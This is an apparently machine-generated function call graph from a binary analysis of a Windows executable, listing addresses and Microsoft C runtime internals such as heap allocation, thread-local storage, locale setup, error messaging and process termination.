__NMSG_WRITE 58 API calls 6760->6763 6762 3f362d __FF_MSGBANNER 58 API calls 6761->6762 6762->6760 6764 3f1f71 6763->6764 6765 3f22b5 _doexit 3 API calls 6764->6765 6766 3f1f7b 6765->6766 6766->6604 6768 3f362d __FF_MSGBANNER 58 API calls 6767->6768 6769 3f22d3 6768->6769 6770 3f368a __NMSG_WRITE 58 API calls 6769->6770 6771 3f22db 6770->6771 7638 3f2389 6771->7638 6775 3f243f _doexit 58 API calls 6774->6775 6776 3f257d 6775->6776 6776->6633 6778 3f243f _doexit 58 API calls 6777->6778 6779 3f2301 6778->6779 6779->6636 6781 3f23ae __init_pointers __initp_misc_winsig 6780->6781 6820 3f4d2f EncodePointer 6781->6820 6783 3f23c6 __init_pointers 6784 3f3b0c 34 API calls 6783->6784 6784->6646 6786 3f4b0e 6785->6786 6788 3f2fe0 6786->6788 6821 3f3a9e 6786->6821 6788->6649 6789 3f39fd 6788->6789 6790 3f2ff6 6789->6790 6791 3f3a14 TlsAlloc 6789->6791 6790->6649 6790->6654 6795 3f25ba 6792->6795 6794 3f25f5 6794->6657 6807 3f3a59 6794->6807 6795->6794 6796 3f25d8 6795->6796 6824 3f56f0 6795->6824 6796->6794 6796->6795 6832 3f3da5 Sleep 6796->6832 6799 3f3056 6798->6799 6801 3f305c 6798->6801 6861 3f3a1b 6799->6861 6802 3f4a1b DeleteCriticalSection 6801->6802 6803 3f4a37 6801->6803 6804 3f1b1f __getptd_noexit 58 API calls 6802->6804 6805 3f2fe9 6803->6805 6806 3f4a43 DeleteCriticalSection 6803->6806 6804->6801 6805->6607 6806->6803 6808 3f3a6f 6807->6808 6809 3f3a73 TlsSetValue 6807->6809 6808->6661 6809->6661 6811 3f2f2f __initptd 6810->6811 6864 3f49d1 6811->6864 6813 3f2f6c 6871 3f2fc4 6813->6871 6816 3f49d1 __lock 58 API calls 6817 3f2f8d ___addlocaleref 6816->6817 6874 3f2fcd 6817->6874 6819 3f2fb8 __initptd 6819->6664 6820->6783 6822 3f3aae 6821->6822 6823 3f3abb InitializeCriticalSectionAndSpinCount 6821->6823 6822->6786 6823->6786 6825 3f56fb 6824->6825 6828 3f5716 6824->6828 6826 3f5707 6825->6826 6825->6828 6833 3f2218 6826->6833 6829 3f5726 RtlAllocateHeap 6828->6829 6830 3f570c 6828->6830 6836 3f493b DecodePointer 6828->6836 6829->6828 6829->6830 6830->6795 6832->6796 6838 3f2eb4 GetLastError 6833->6838 6835 3f221d 6835->6830 6837 3f494e 6836->6837 6837->6828 6852 3f3a3a 6838->6852 6840 3f2ec9 6841 3f2f17 SetLastError 6840->6841 6842 3f25b3 __calloc_crt 55 API calls 6840->6842 6841->6835 6843 3f2edc 6842->6843 6843->6841 6844 3f3a59 __getptd_noexit TlsSetValue 6843->6844 6845 3f2ef0 6844->6845 6846 3f2f0e 6845->6846 6847 3f2ef6 6845->6847 6855 3f1b1f 6846->6855 6848 3f2f23 __initptd 55 API calls 6847->6848 6850 3f2efe GetCurrentThreadId 6848->6850 6850->6841 6851 3f2f14 6851->6841 6853 3f3a4d 6852->6853 6854 3f3a51 TlsGetValue 6852->6854 6853->6840 6854->6840 6856 3f1b28 HeapFree 6855->6856 6857 3f1b51 __dosmaperr 6855->6857 6856->6857 6858 3f1b3d 6856->6858 6857->6851 6859 3f2218 __cftoe_l 56 API calls 6858->6859 6860 3f1b43 GetLastError 6859->6860 6860->6857 6862 3f3a2e 6861->6862 6863 3f3a32 TlsFree 6861->6863 6862->6801 6863->6801 6865 3f49f5 EnterCriticalSection 6864->6865 6866 3f49e2 6864->6866 6865->6813 6877 3f4a59 6866->6877 6868 3f49e8 6868->6865 6869 3f22cb __lock 57 API calls 6868->6869 6870 3f49f4 6869->6870 6870->6865 7067 3f4b3b LeaveCriticalSection 6871->7067 6873 3f2f86 6873->6816 7068 3f4b3b LeaveCriticalSection 6874->7068 6876 3f2fd4 6876->6819 6878 3f4a65 __initptd 6877->6878 6879 3f4a84 6878->6879 6899 3f362d 6878->6899 6888 3f4aa7 __initptd 6879->6888 6941 3f25fb 6879->6941 6886 3f4aa2 6890 3f2218 __cftoe_l 58 API calls 6886->6890 6887 3f4ab1 6891 3f49d1 __lock 58 API calls 6887->6891 6888->6868 6890->6888 6892 3f4ab8 6891->6892 6893 3f4add 6892->6893 6894 3f4ac5 6892->6894 6895 3f1b1f __getptd_noexit 58 API calls 6893->6895 6896 3f3a9e ___lock_fhandle InitializeCriticalSectionAndSpinCount 6894->6896 6897 3f4ad1 6895->6897 6896->6897 6946 3f4af9 6897->6946 6949 3f3854 6899->6949 6901 3f3634 6902 3f3641 6901->6902 6903 3f3854 __FF_MSGBANNER 58 API calls 6901->6903 6904 3f368a __NMSG_WRITE 58 API calls 6902->6904 6907 3f3663 6902->6907 6903->6902 6905 3f3659 6904->6905 6906 3f368a __NMSG_WRITE 58 API calls 6905->6906 6906->6907 6908 3f368a 6907->6908 6909 3f36a8 __NMSG_WRITE 6908->6909 6910 3f3854 __FF_MSGBANNER 55 API calls 6909->6910 6937 3f37cf 6909->6937 6912 3f36bb 6910->6912 6914 3f37d4 GetStdHandle 6912->6914 6915 3f3854 __FF_MSGBANNER 55 API calls 6912->6915 6913 3f3838 6938 3f22b5 6913->6938 6918 3f37e2 _strlen 6914->6918 6914->6937 6916 3f36cc 6915->6916 6916->6914 6917 3f36de 6916->6917 6917->6937 6979 3f5f51 6917->6979 6920 3f381b WriteFile 6918->6920 6918->6937 6920->6937 6922 3f383c 6925 3f29f1 __invoke_watson 8 API calls 6922->6925 6923 3f370b GetModuleFileNameW 6924 3f372b 6923->6924 6930 3f373b __NMSG_WRITE 6923->6930 6926 3f5f51 __NMSG_WRITE 55 API calls 6924->6926 6927 3f3846 6925->6927 6926->6930 6928 3f3781 6928->6922 6997 3f5ee5 6928->6997 6930->6922 6930->6928 6988 3f5fc6 6930->6988 6933 3f5ee5 __NMSG_WRITE 55 API calls 6934 3f37b8 6933->6934 6934->6922 6935 3f37bf 6934->6935 7006 3f6084 EncodePointer 6935->7006 7031 3f1b07 6937->7031 7046 3f2281 GetModuleHandleExW 6938->7046 6944 3f2609 6941->6944 6943 3f263b 6943->6886 6943->6887 6944->6943 7049 3f477c 6944->7049 7065 3f3da5 Sleep 6944->7065 7066 3f4b3b LeaveCriticalSection 6946->7066 6948 3f4b00 6948->6888 6950 3f385e 6949->6950 6951 3f2218 __cftoe_l 58 API calls 6950->6951 6952 3f3868 6950->6952 6953 3f3884 6951->6953 6952->6901 6956 3f29e1 6953->6956 6959 3f29b6 DecodePointer 6956->6959 6960 3f29c9 6959->6960 6965 3f29f1 IsProcessorFeaturePresent 6960->6965 6963 3f29b6 __cftoe_l 8 API calls 6964 3f29ed 6963->6964 6964->6901 6966 3f29fc 6965->6966 6971 3f2884 6966->6971 6970 3f29e0 6970->6963 6972 3f289e _memset ___raise_securityfailure 6971->6972 6973 3f28be IsDebuggerPresent 6972->6973 6974 3f3dc8 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6973->6974 6976 3f2982 ___raise_securityfailure 6974->6976 6975 3f1b07 __cftoe_l 6 API calls 6977 3f29a5 6975->6977 6976->6975 6978 3f3db3 GetCurrentProcess TerminateProcess 6977->6978 6978->6970 6980 3f5f6a 6979->6980 6981 3f5f5c 6979->6981 6982 3f2218 __cftoe_l 58 API calls 6980->6982 6981->6980 6985 3f5f83 6981->6985 6983 3f5f74 6982->6983 6984 3f29e1 __cftoe_l 9 API calls 6983->6984 6986 3f36fe 6984->6986 6985->6986 6987 3f2218 __cftoe_l 58 API calls 6985->6987 6986->6922 6986->6923 6987->6983 6991 3f5fd4 6988->6991 6989 3f5fd8 6990 3f2218 __cftoe_l 58 API calls 6989->6990 6992 3f5fdd 6989->6992 6996 3f6008 6990->6996 6991->6989 6991->6992 6994 3f6017 6991->6994 6992->6928 6993 3f29e1 __cftoe_l 9 API calls 6993->6992 6994->6992 6995 3f2218 __cftoe_l 58 API calls 6994->6995 6995->6996 6996->6993 6998 3f5eff 6997->6998 7000 3f5ef1 6997->7000 6999 3f2218 __cftoe_l 58 API calls 6998->6999 7001 3f5f09 6999->7001 7000->6998 7004 3f5f2b 7000->7004 7002 3f29e1 __cftoe_l 9 API calls 7001->7002 7003 3f37a1 7002->7003 7003->6922 7003->6933 7004->7003 7005 3f2218 __cftoe_l 58 API calls 7004->7005 7005->7001 7007 3f60b8 ___crtIsPackagedApp 7006->7007 7008 3f6177 IsDebuggerPresent 7007->7008 7009 3f60c7 LoadLibraryExW 7007->7009 7012 3f619c 7008->7012 7013 3f6181 7008->7013 7010 3f60de GetLastError 7009->7010 7011 3f6104 GetProcAddress 7009->7011 7014 3f60ed LoadLibraryExW 7010->7014 7021 3f6194 7010->7021 7015 3f6118 7 API calls 7011->7015 7011->7021 7016 3f618f 7012->7016 7018 3f61a1 DecodePointer 7012->7018 7013->7016 7017 3f6188 OutputDebugStringW 7013->7017 7014->7011 7014->7021 7019 3f6174 7015->7019 7020 3f6160 GetProcAddress EncodePointer 7015->7020 7016->7021 7022 3f61c8 DecodePointer DecodePointer 7016->7022 7029 3f61e0 7016->7029 7017->7016 7018->7021 7019->7008 7020->7019 7025 3f1b07 __cftoe_l 6 API calls 7021->7025 7022->7029 7023 3f6204 DecodePointer 7023->7021 7024 3f6218 DecodePointer 7024->7023 7027 3f621f 7024->7027 7028 3f6266 7025->7028 7027->7023 7030 3f6230 DecodePointer 7027->7030 7028->6937 7029->7023 7029->7024 7030->7023 7032 3f1b0f 7031->7032 7033 3f1b11 IsProcessorFeaturePresent 7031->7033 7032->6913 7035 3f2061 7033->7035 7038 3f2010 IsDebuggerPresent 7035->7038 7039 3f2025 ___raise_securityfailure 7038->7039 7044 3f3dc8 SetUnhandledExceptionFilter UnhandledExceptionFilter 7039->7044 7041 3f202d ___raise_securityfailure 7045 3f3db3 GetCurrentProcess TerminateProcess 7041->7045 7043 3f204a 7043->6913 7044->7041 7045->7043 7047 3f229a GetProcAddress 7046->7047 7048 3f22ac ExitProcess 7046->7048 7047->7048 7050 3f47f7 7049->7050 7058 3f4788 7049->7058 7051 3f493b _malloc DecodePointer 7050->7051 7052 3f47fd 7051->7052 7054 3f2218 __cftoe_l 57 API calls 7052->7054 7053 3f362d __FF_MSGBANNER 57 API calls 7053->7058 7064 3f47ef 7054->7064 7055 3f47bb HeapAlloc 7055->7058 7055->7064 7056 3f368a __NMSG_WRITE 57 API calls 7056->7058 7057 3f47e3 7060 3f2218 __cftoe_l 57 API calls 7057->7060 7058->7053 7058->7055 7058->7056 7058->7057 7059 3f493b _malloc DecodePointer 7058->7059 7061 3f22b5 _doexit 3 API calls 7058->7061 7062 3f47e1 7058->7062 7059->7058 7060->7062 7061->7058 7063 3f2218 __cftoe_l 57 API calls 7062->7063 7063->7064 7064->6944 7065->6944 7066->6948 7067->6873 7068->6876 7072 3f4b3b LeaveCriticalSection 7069->7072 7071 3f331b 7071->6672 7072->7071 7074 3f33f2 7073->7074 7078 3f3456 7074->7078 7083 3f5ecf 7074->7083 7076 3f3373 7076->6703 7076->6705 7077 3f5ecf _parse_cmdline 58 API calls 7077->7078 7078->7076 7078->7077 7080 3f4f88 7079->7080 7081 3f4f81 7079->7081 7080->6699 7387 3f535d 7081->7387 7086 3f5e75 7083->7086 7089 3f4f96 7086->7089 7090 3f4fa7 7089->7090 7093 3f4ff4 7089->7093 7097 3f2e9c 7090->7097 7093->7074 7094 3f4fd4 7094->7093 7117 3f52b7 7094->7117 7098 3f2eb4 __getptd_noexit 58 API calls 7097->7098 7099 3f2ea2 7098->7099 7100 3f2eaf 7099->7100 7101 3f22cb __lock 58 API calls 7099->7101 7100->7094 7102 3f5c3a 7100->7102 7101->7100 7103 3f5c46 __initptd 7102->7103 7104 3f2e9c ___InternalCxxFrameHandler 58 API calls 7103->7104 7105 3f5c4f 7104->7105 7106 3f5c7e 7105->7106 7108 3f5c62 7105->7108 7107 3f49d1 __lock 58 API calls 7106->7107 7109 3f5c85 7107->7109 7110 3f2e9c ___InternalCxxFrameHandler 58 API calls 7108->7110 7129 3f5cba 7109->7129 7111 3f5c67 7110->7111 7114 3f5c75 __initptd 7111->7114 7116 3f22cb __lock 58 API calls 7111->7116 7114->7094 7116->7114 7118 3f52c3 __initptd 7117->7118 7119 3f2e9c ___InternalCxxFrameHandler 58 API calls 7118->7119 7120 3f52cd 7119->7120 7121 3f52df 7120->7121 7122 3f49d1 __lock 58 API calls 7120->7122 7124 3f52ed __initptd 7121->7124 7126 3f22cb __lock 58 API calls 7121->7126 7127 3f52fd 7122->7127 7123 3f532a 7383 3f5354 7123->7383 7124->7093 7126->7124 7127->7123 7128 3f1b1f __getptd_noexit 58 API calls 7127->7128 7128->7123 7130 3f5c99 7129->7130 7131 3f5cc5 ___addlocaleref ___removelocaleref 7129->7131 7133 3f5cb1 7130->7133 7131->7130 7136 3f5a40 7131->7136 7382 3f4b3b LeaveCriticalSection 7133->7382 7135 3f5cb8 7135->7111 7137 3f5ab9 7136->7137 7142 3f5a55 7136->7142 7138 3f5b06 7137->7138 7139 3f1b1f __getptd_noexit 58 API calls 7137->7139 7151 3f5b2f 7138->7151 7206 3f728a 7138->7206 7143 3f5ada 7139->7143 7141 3f5a86 7145 3f5aa4 7141->7145 7156 3f1b1f __getptd_noexit 58 API calls 7141->7156 7142->7137 7142->7141 7148 3f1b1f __getptd_noexit 58 API calls 7142->7148 7146 3f1b1f __getptd_noexit 58 API calls 7143->7146 7152 3f1b1f __getptd_noexit 58 API calls 7145->7152 7150 3f5aed 7146->7150 7147 3f1b1f __getptd_noexit 58 API calls 7147->7151 7154 3f5a7b 7148->7154 7149 3f5b8e 7155 3f1b1f __getptd_noexit 58 API calls 7149->7155 7157 3f1b1f __getptd_noexit 58 API calls 7150->7157 7151->7149 7165 3f1b1f 58 API calls __getptd_noexit 7151->7165 7153 3f5aae 7152->7153 7158 3f1b1f __getptd_noexit 58 API calls 7153->7158 7166 3f7127 7154->7166 7160 3f5b94 7155->7160 7161 3f5a99 7156->7161 7162 3f5afb 7157->7162 7158->7137 7160->7130 7194 3f7223 7161->7194 7164 3f1b1f __getptd_noexit 58 API calls 7162->7164 7164->7138 7165->7151 7167 3f7136 7166->7167 7193 3f721f 7166->7193 7168 3f7147 7167->7168 7169 3f1b1f __getptd_noexit 58 API calls 7167->7169 7170 3f7159 7168->7170 7171 3f1b1f __getptd_noexit 58 API calls 7168->7171 7169->7168 7172 3f716b 7170->7172 7173 3f1b1f __getptd_noexit 58 API calls 7170->7173 7171->7170 7174 3f717d 7172->7174 7175 3f1b1f __getptd_noexit 58 API calls 7172->7175 7173->7172 7176 3f1b1f __getptd_noexit 58 API calls 7174->7176 7177 3f718f 7174->7177 7175->7174 7176->7177 7178 3f1b1f __getptd_noexit 58 API calls 7177->7178 7179 3f71a1 7177->7179 7178->7179 7180 3f71b3 7179->7180 7181 3f1b1f __getptd_noexit 58 API calls 7179->7181 7182 3f71c5 7180->7182 7183 3f1b1f __getptd_noexit 58 API calls 7180->7183 7181->7180 7184 3f71d7 7182->7184 7185 3f1b1f __getptd_noexit 58 API calls 7182->7185 7183->7182 7186 3f71e9 7184->7186 7187 3f1b1f __getptd_noexit 58 API calls 7184->7187 7185->7184 7188 3f71fb 7186->7188 7189 3f1b1f __getptd_noexit 58 API calls 7186->7189 7187->7186 7190 3f720d 7188->7190 7191 3f1b1f __getptd_noexit 58 API calls 7188->7191 7189->7188 7192 3f1b1f __getptd_noexit 58 API calls 7190->7192 7190->7193 7191->7190 7192->7193 7193->7141 7195 3f722e 7194->7195 7205 3f7286 7194->7205 7196 3f723e 7195->7196 7197 3f1b1f __getptd_noexit 58 API calls 7195->7197 7198 3f1b1f __getptd_noexit 58 API calls 7196->7198 7201 3f7250 7196->7201 7197->7196 7198->7201 7199 3f7262 7200 3f7274 7199->7200 7203 3f1b1f __getptd_noexit 58 API calls 7199->7203 7204 3f1b1f __getptd_noexit 58 API calls 7200->7204 7200->7205 7201->7199 7202 3f1b1f __getptd_noexit 58 API calls 7201->7202 7202->7199 7203->7200 7204->7205 7205->7145 7207 3f7299 7206->7207 7208 3f5b24 7206->7208 7209 3f1b1f __getptd_noexit 58 API calls 7207->7209 7208->7147 7210 3f72a1 7209->7210 7211 3f1b1f __getptd_noexit 58 API calls 7210->7211 7212 3f72a9 7211->7212 7213 3f1b1f __getptd_noexit 58 API calls 7212->7213 7214 3f72b1 7213->7214 7215 3f1b1f __getptd_noexit 58 API calls 7214->7215 7216 3f72b9 7215->7216 7217 3f1b1f __getptd_noexit 58 API calls 7216->7217 7218 3f72c1 7217->7218 7219 3f1b1f __getptd_noexit 58 API calls 7218->7219 7220 3f72c9 7219->7220 7221 3f1b1f __getptd_noexit 58 API calls 7220->7221 7222 3f72d0 7221->7222 7223 3f1b1f __getptd_noexit 58 API calls 7222->7223 7224 3f72d8 7223->7224 7225 3f1b1f __getptd_noexit 58 API calls 7224->7225 7226 3f72e0 7225->7226 7227 3f1b1f __getptd_noexit 58 API calls 7226->7227 7228 3f72e8 7227->7228 7229 3f1b1f __getptd_noexit 58 API calls 7228->7229 7230 3f72f0 7229->7230 7231 3f1b1f __getptd_noexit 58 API calls 7230->7231 7232 3f72f8 7231->7232 7233 3f1b1f __getptd_noexit 58 API calls 7232->7233 7234 3f7300 7233->7234 7235 3f1b1f __getptd_noexit 58 API calls 7234->7235 7236 3f7308 7235->7236 7237 3f1b1f __getptd_noexit 58 API calls 7236->7237 7238 3f7310 7237->7238 7239 3f1b1f __getptd_noexit 58 API calls 7238->7239 7240 3f7318 7239->7240 7241 3f1b1f __getptd_noexit 58 API calls 7240->7241 7242 3f7323 7241->7242 7243 3f1b1f __getptd_noexit 58 API calls 7242->7243 7244 3f732b 7243->7244 7245 3f1b1f __getptd_noexit 58 API calls 7244->7245 7246 3f7333 7245->7246 7247 3f1b1f __getptd_noexit 58 API calls 7246->7247 7248 3f733b 7247->7248 7249 3f1b1f __getptd_noexit 58 API calls 7248->7249 7250 3f7343 7249->7250 7251 3f1b1f __getptd_noexit 58 API calls 7250->7251 7252 3f734b 7251->7252 7253 3f1b1f __getptd_noexit 58 API calls 7252->7253 7254 3f7353 7253->7254 7255 3f1b1f __getptd_noexit 58 API calls 7254->7255 7256 3f735b 7255->7256 7257 3f1b1f __getptd_noexit 58 API calls 7256->7257 7258 3f7363 7257->7258 7259 3f1b1f __getptd_noexit 58 API calls 7258->7259 7260 3f736b 7259->7260 7261 3f1b1f __getptd_noexit 58 API calls 7260->7261 7262 3f7373 7261->7262 7263 3f1b1f __getptd_noexit 58 API calls 7262->7263 7264 3f737b 7263->7264 7265 3f1b1f __getptd_noexit 58 API calls 7264->7265 7266 3f7383 7265->7266 7267 3f1b1f __getptd_noexit 58 API calls 7266->7267 7268 3f738b 7267->7268 7269 3f1b1f __getptd_noexit 58 API calls 7268->7269 7270 3f7393 7269->7270 7271 3f1b1f __getptd_noexit 58 API calls 7270->7271 7272 3f739b 7271->7272 7273 3f1b1f __getptd_noexit 58 API calls 7272->7273 7274 3f73a9 7273->7274 7275 3f1b1f __getptd_noexit 58 API calls 7274->7275 7276 3f73b4 7275->7276 7277 3f1b1f __getptd_noexit 58 API calls 7276->7277 7278 3f73bf 7277->7278 7279 3f1b1f __getptd_noexit 58 API calls 7278->7279 7280 3f73ca 7279->7280 7281 3f1b1f __getptd_noexit 58 API calls 7280->7281 7282 3f73d5 7281->7282 7283 3f1b1f __getptd_noexit 58 API calls 7282->7283 7284 3f73e0 7283->7284 7285 3f1b1f __getptd_noexit 58 API calls 7284->7285 7286 3f73eb 7285->7286 7287 3f1b1f __getptd_noexit 58 API calls 7286->7287 7288 3f73f6 7287->7288 7289 3f1b1f __getptd_noexit 58 API calls 7288->7289 7290 3f7401 7289->7290 7291 3f1b1f __getptd_noexit 58 API calls 7290->7291 7292 3f740c 7291->7292 7293 3f1b1f __getptd_noexit 58 API calls 7292->7293 7294 3f7417 7293->7294 7295 3f1b1f __getptd_noexit 58 API calls 7294->7295 7296 3f7422 7295->7296 7297 3f1b1f __getptd_noexit 58 API calls 7296->7297 7298 3f742d 7297->7298 7299 3f1b1f __getptd_noexit 58 API calls 7298->7299 7300 3f7438 7299->7300 7301 3f1b1f __getptd_noexit 58 API calls 7300->7301 7302 3f7443 7301->7302 7303 3f1b1f __getptd_noexit 58 API calls 7302->7303 7304 3f744e 7303->7304 7305 3f1b1f __getptd_noexit 58 API calls 7304->7305 7306 3f745c 7305->7306 7307 3f1b1f __getptd_noexit 58 API calls 7306->7307 7308 3f7467 7307->7308 7309 3f1b1f __getptd_noexit 58 API calls 7308->7309 7310 3f7472 7309->7310 7311 3f1b1f __getptd_noexit 58 API calls 7310->7311 7312 3f747d 7311->7312 7313 3f1b1f __getptd_noexit 58 API calls 7312->7313 7314 3f7488 7313->7314 7315 3f1b1f __getptd_noexit 58 API calls 7314->7315 7316 3f7493 7315->7316 7317 3f1b1f __getptd_noexit 58 API calls 7316->7317 7318 3f749e 7317->7318 7319 3f1b1f __getptd_noexit 58 API calls 7318->7319 7320 3f74a9 7319->7320 7321 3f1b1f __getptd_noexit 58 API calls 7320->7321 7322 3f74b4 7321->7322 7323 3f1b1f __getptd_noexit 58 API calls 7322->7323 7324 3f74bf 7323->7324 7325 3f1b1f __getptd_noexit 58 API calls 7324->7325 7326 3f74ca 7325->7326 7327 3f1b1f __getptd_noexit 58 API calls 7326->7327 7328 3f74d5 7327->7328 7329 3f1b1f __getptd_noexit 58 API calls 7328->7329 7330 3f74e0 7329->7330 7331 3f1b1f __getptd_noexit 58 API calls 7330->7331 7332 3f74eb 7331->7332 7333 3f1b1f __getptd_noexit 58 API calls 7332->7333 7334 3f74f6 7333->7334 7335 3f1b1f __getptd_noexit 58 API calls 7334->7335 7336 3f7501 7335->7336 7337 3f1b1f __getptd_noexit 58 API calls 7336->7337 7338 3f750f 7337->7338 7339 3f1b1f __getptd_noexit 58 API calls 7338->7339 7340 3f751a 7339->7340 7341 3f1b1f __getptd_noexit 58 API calls 7340->7341 7342 3f7525 7341->7342 7343 3f1b1f __getptd_noexit 58 API calls 7342->7343 7344 3f7530 7343->7344 7345 3f1b1f __getptd_noexit 58 API calls 7344->7345 7346 3f753b 7345->7346 7347 3f1b1f __getptd_noexit 58 API calls 7346->7347 7348 3f7546 7347->7348 7349 3f1b1f __getptd_noexit 58 API calls 7348->7349 7350 3f7551 7349->7350 7351 3f1b1f __getptd_noexit 58 API calls 7350->7351 7352 3f755c 7351->7352 7353 3f1b1f __getptd_noexit 58 API calls 7352->7353 7354 3f7567 7353->7354 7355 3f1b1f __getptd_noexit 58 API calls 7354->7355 7356 3f7572 7355->7356 7357 3f1b1f __getptd_noexit 58 API calls 7356->7357 7358 3f757d 7357->7358 7359 3f1b1f __getptd_noexit 58 API calls 7358->7359 7360 3f7588 7359->7360 7361 3f1b1f __getptd_noexit 58 API calls 7360->7361 7362 3f7593 7361->7362 7363 3f1b1f __getptd_noexit 58 API calls 7362->7363 7364 3f759e 7363->7364 7365 3f1b1f __getptd_noexit 58 API calls 7364->7365 7366 3f75a9 7365->7366 7367 3f1b1f __getptd_noexit 58 API calls 7366->7367 7368 3f75b4 7367->7368 7369 3f1b1f __getptd_noexit 58 API calls 7368->7369 7370 3f75c2 7369->7370 7371 3f1b1f __getptd_noexit 58 API calls 7370->7371 7372 3f75cd 7371->7372 7373 3f1b1f __getptd_noexit 58 API calls 7372->7373 7374 3f75d8 7373->7374 7375 3f1b1f __getptd_noexit 58 API calls 7374->7375 7376 3f75e3 7375->7376 7377 3f1b1f __getptd_noexit 58 API calls 7376->7377 7378 3f75ee 7377->7378 7379 3f1b1f __getptd_noexit 58 API calls 7378->7379 7380 3f75f9 7379->7380 7381 3f1b1f __getptd_noexit 58 API calls 7380->7381 7381->7208 7382->7135 7386 3f4b3b LeaveCriticalSection 7383->7386 7385 3f535b 7385->7121 7386->7385 7388 3f5369 __initptd 7387->7388 7389 3f2e9c ___InternalCxxFrameHandler 58 API calls 7388->7389 7390 3f5371 7389->7390 7391 3f52b7 _LocaleUpdate::_LocaleUpdate 58 API calls 7390->7391 7392 3f537b 7391->7392 7412 3f5058 7392->7412 7395 3f25fb __malloc_crt 58 API calls 7396 3f539d 7395->7396 7397 3f54ca __initptd 7396->7397 7419 3f5505 7396->7419 7397->7080 7400 3f54da 7400->7397 7403 3f54ed 7400->7403 7405 3f1b1f __getptd_noexit 58 API calls 7400->7405 7401 3f53d3 7402 3f53f3 7401->7402 7404 3f1b1f __getptd_noexit 58 API calls 7401->7404 7402->7397 7407 3f49d1 __lock 58 API calls 7402->7407 7406 3f2218 __cftoe_l 58 API calls 7403->7406 7404->7402 7405->7403 7406->7397 7408 3f5422 7407->7408 7409 3f54b0 7408->7409 7411 3f1b1f __getptd_noexit 58 API calls 7408->7411 7429 3f54cf 7409->7429 7411->7409 7413 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 7412->7413 7414 3f5068 7413->7414 7415 3f5089 7414->7415 7416 3f5077 GetOEMCP 7414->7416 7417 3f50a0 7415->7417 7418 3f508e GetACP 7415->7418 7416->7417 7417->7395 7417->7397 7418->7417 7420 3f5058 getSystemCP 60 API calls 7419->7420 7421 3f5522 7420->7421 7424 3f5573 IsValidCodePage 7421->7424 7426 3f5529 setSBCS 7421->7426 7428 3f5598 _memset __setmbcp_nolock 7421->7428 7422 3f1b07 __cftoe_l 6 API calls 7423 3f53c4 7422->7423 7423->7400 7423->7401 7425 3f5585 GetCPInfo 7424->7425 7424->7426 7425->7426 7425->7428 7426->7422 7432 3f5125 GetCPInfo 7428->7432 7498 3f4b3b LeaveCriticalSection 7429->7498 7431 3f54d6 7431->7397 7433 3f5207 7432->7433 7437 3f515d 7432->7437 7436 3f1b07 __cftoe_l 6 API calls 7433->7436 7439 3f52b3 7436->7439 7442 3f6d96 7437->7442 7439->7426 7441 3f6c58 ___crtLCMapStringA 62 API calls 7441->7433 7443 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 7442->7443 7444 3f6da7 7443->7444 7452 3f6c9e 7444->7452 7447 3f6c58 7448 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 7447->7448 7449 3f6c69 7448->7449 7469 3f6a54 7449->7469 7453 3f6cb8 7452->7453 7454 3f6cc5 MultiByteToWideChar 7452->7454 7453->7454 7455 3f6cea 7454->7455 7457 3f6cf1 7454->7457 7456 3f1b07 __cftoe_l 6 API calls 7455->7456 7458 3f51be 7456->7458 7460 3f477c _malloc 58 API calls 7457->7460 7463 3f6d13 _memset __alloca_probe_16 7457->7463 7458->7447 7459 3f6d4f MultiByteToWideChar 7461 3f6d79 7459->7461 7462 3f6d69 GetStringTypeW 7459->7462 7460->7463 7465 3f62b6 7461->7465 7462->7461 7463->7455 7463->7459 7466 3f62d1 7465->7466 7467 3f62c0 7465->7467 7466->7455 7467->7466 7468 3f1b1f __getptd_noexit 58 API calls 7467->7468 7468->7466 7471 3f6a6d MultiByteToWideChar 7469->7471 7472 3f6acc 7471->7472 7475 3f6ad3 7471->7475 7473 3f1b07 __cftoe_l 6 API calls 7472->7473 7476 3f51df 7473->7476 7474 3f6b32 MultiByteToWideChar 7477 3f6b4b 7474->7477 7493 3f6b99 7474->7493 7480 3f477c _malloc 58 API calls 7475->7480 7482 3f6afb __alloca_probe_16 7475->7482 7476->7441 7494 3f634c 7477->7494 7479 3f62b6 __crtLCMapStringA_stat 58 API calls 7479->7472 7480->7482 7481 3f6b5f 7483 3f6b75 7481->7483 7485 3f6ba1 7481->7485 7481->7493 7482->7472 7482->7474 7484 3f634c __crtLCMapStringA_stat LCMapStringW 7483->7484 7483->7493 7484->7493 7487 3f6bc9 __alloca_probe_16 7485->7487 7488 3f477c _malloc 58 API calls 7485->7488 7486 3f634c __crtLCMapStringA_stat LCMapStringW 7490 3f6c0c 7486->7490 7487->7486 7487->7493 7488->7487 7489 3f6c34 7491 3f62b6 __crtLCMapStringA_stat 58 API calls 7489->7491 7490->7489 7492 3f6c26 WideCharToMultiByte 7490->7492 7491->7493 7492->7489 7493->7479 7495 3f635c 7494->7495 7496 3f6377 __crtLCMapStringA_stat 7494->7496 7495->7481 7497 3f638e LCMapStringW 7496->7497 7497->7481 7498->7431 7500 3f58db 7499->7500 7501 3f58cd 7499->7501 7502 3f2218 __cftoe_l 58 API calls 7500->7502 7501->7500 7503 3f58f1 7501->7503 7507 3f58e2 7502->7507 7505 3f58ec 7503->7505 7506 3f2218 __cftoe_l 58 API calls 7503->7506 7504 3f29e1 __cftoe_l 9 API calls 7504->7505 7505->6720 7506->7507 7507->7504 7509 3f4c94 EncodePointer 7508->7509 7509->7509 7510 3f4cae 7509->7510 7510->6727 7514 3f1b86 7511->7514 7513 3f1c8d 7513->6729 7515 3f1b92 __initptd 7514->7515 7522 3f242d 7515->7522 7521 3f1bb9 __initptd 7521->7513 7523 3f49d1 __lock 58 API calls 7522->7523 7524 3f1b9b 7523->7524 7525 3f1bca DecodePointer DecodePointer 7524->7525 7526 3f1ba7 7525->7526 7527 3f1bf7 7525->7527 7536 3f1bc4 7526->7536 7527->7526 7539 3f2582 7527->7539 7529 3f1c5a EncodePointer EncodePointer 7529->7526 7530 3f1c09 7530->7529 7531 3f1c2e 7530->7531 7546 3f2642 7530->7546 7531->7526 7533 3f2642 __realloc_crt 61 API calls 7531->7533 7534 3f1c48 EncodePointer 7531->7534 7535 3f1c42 7533->7535 7534->7529 7535->7526 7535->7534 7573 3f2436 7536->7573 7540 3f258b 7539->7540 7541 3f25a0 HeapSize 7539->7541 7542 3f2218 __cftoe_l 58 API calls 7540->7542 7541->7530 7543 3f2590 7542->7543 7544 3f29e1 __cftoe_l 9 